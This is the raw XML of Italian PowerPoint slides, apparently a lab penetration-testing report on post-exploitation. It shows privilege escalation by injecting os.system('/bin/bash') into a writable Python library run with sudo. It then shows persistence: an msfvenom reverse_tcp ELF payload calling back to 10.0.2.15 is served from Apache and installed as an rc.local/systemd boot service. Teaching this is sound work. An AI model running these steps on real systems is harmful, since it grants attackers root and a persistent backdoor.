              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr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97E33B9-2A4B-3887-BBE3-862D870F8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87" y="3804487"/>
            <a:ext cx="6439799" cy="2543530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3649513936"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow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post exploitation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Privilege escalation</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194478" y="1453163"/>
            <a:ext cx="9673389" cy="507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Abbiamo il permesso di scrittura per il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>base64.py </a:t>
            </a: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Tramite un editor modifichiamo il file, inserendo la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>librera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ed il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(”/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pP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Eseguiamo il comando		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sudo /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/bin/python3.8 /home/randy/randombase64.py</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ed otteniamo la shell di root.</a:t>
            </a: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2400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i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRP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65A6A9D-F21A-BAF3-6212-611CA340F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77" y="2984304"/>
            <a:ext cx="5136923" cy="1802333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4FFBD27-49C5-E7EC-9241-FA893EAB7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335" y="5924762"/>
            <a:ext cx="7752292" cy="470105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1633640247"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow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post exploitation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Maintaining access</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194478" y="1453163"/>
            <a:ext cx="9673389" cy="507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</a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>Per ottenere informazioni sul sistema utilizziamo il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0"/>
              <a:t> –a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pP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/>
              <a:t>Creiamo il payload con il comando</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0"/>
              <a:t> -a x64 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>platform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0"/>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0"/>
              <a:t>/x64/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0"/>
              <a:t> LHOST=10.0.2.15 LPORT=4444 -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0"/>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>shell.elf</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400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i="1" dirty="0"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FDD729C-B6C0-AD4C-A643-F5A4CEE10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5" y="2209676"/>
            <a:ext cx="10461763" cy="499244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94A9413-CAA3-44A2-0E27-36DAB682B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94" y="4537840"/>
            <a:ext cx="10336106" cy="1092804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100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4165832414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post exploitation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Maintaining access</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194478" y="1453163"/>
            <a:ext cx="9673389" cy="507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Creiamo uno script denominato  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>in.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>che esegua automaticamente il payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shell.elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ad ogni sua esecuzione</a:t>
            </a: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 Copiamo lo script e il payload creati nella directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/var/www/html </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" b="1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Diamo i permessi di esecuzione a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>in.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shell.elf</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" b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Tramite il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>service apache2 start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> viene avviato il servizio Apache HTTP Server sulla macchina Kali</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5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7DED323C-8DF5-BBD0-FD39-AFA3EBA0B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06" y="5461665"/>
            <a:ext cx="3829050" cy="10191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D9CD5B5-93E9-D1E8-C086-50C7127B3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49" y="4398084"/>
            <a:ext cx="6853237" cy="212716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76480278"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow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E659C033-B97A-06FF-C7B4-534A4623C971}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8198068" y="3429000"/>
            <a:ext cx="3272921" cy="3205130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="23252E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post exploitation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Maintaining access</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194478" y="1453163"/>
            <a:ext cx="9673389" cy="507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Dalla macchina target, ci spostiamo nella directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a: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Scarichiamo il payload e lo script</a:t>
            </a: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Aggiungiamo il permesso di esecuzione a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shell.elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>in.sh</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" b="1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i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRP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66E0723-A8EE-7C33-112F-946C5F27EF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68"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8275561" y="3518918"/>
            <a:ext cx="2633606" cy="1620399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7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0FCAC466-4D9C-1DF5-3C61-744B46B6B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39" y="3434805"/>
            <a:ext cx="7245162" cy="319932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2FD6626-D07A-8258-4157-BA5102BF7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23" t="6925" r="2740"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8275560" y="5139317"/>
            <a:ext cx="3145767" cy="143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56735"/>
      </p:ext>
    </p:extLst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post exploitation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Maintaining access</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194478" y="1453163"/>
            <a:ext cx="9673389" cy="507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Per garantire l'esecuzione automatica persistente della reverse shell, è necessario creare il servizio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rc.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>con i permessi di esecuzione</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buNone/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Per abilitare lo script per l’esecuzione automatica all’avvio del sistema, creiamo il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/system/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rclocal.service</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" b="1" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6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DD80ADF8-13D2-7B60-EE49-D96548064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4" y="4429582"/>
            <a:ext cx="4905593" cy="1112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2" name="Immagine 11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A9A6B7AD-D3BF-ED05-627E-E442B7900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67" y="3333380"/>
            <a:ext cx="5962274" cy="330517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1542376"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow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post exploitation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Maintaining access</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194478" y="1453163"/>
            <a:ext cx="9673389" cy="507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Abilitiamo il servizio utilizzando il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>enable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rc-local</a:t>
            </a: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Lo avviamo utilizzando il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rc-local.service</a:t>
            </a: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Per verificare che il servizio sia correttamente abilitato e avviato, è possibile utilizzare il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rc-local.service</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800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b="1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b="1" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRP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F075C61-E1A2-3DF7-F7A9-F773A1DB1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74" y="3652781"/>
            <a:ext cx="10061652" cy="287246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9191400"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow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6D8B9-94EC-142E-70D4-33A88D6F11BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6038" y="162646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post exploitation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7EBA0E-936F-F287-0F1A-EB46449B4479}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="780916"/>
            <a:ext cx="12192000" cy="499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Maintaining access</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194477" y="1289202"/>
            <a:ext cx="9673389" cy="507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Al riavvio della macchina di destinazione verrà stabilita una reverse shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Per poter ricevere la connessione, è necessario mettersi in ascolto sulla macchina Kali utilizzando il modulo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" b="1" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" b="1" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6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497EC5B5-62FC-A2B6-1105-3E6F1E12B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2" y="2805482"/>
            <a:ext cx="8128520" cy="380789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3981610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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889533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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614266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3064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="136095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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="134817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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="2300961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4472C4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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173"/>
            <a:ext cx="2611973" cy="236512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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718908" y="2803267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 sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
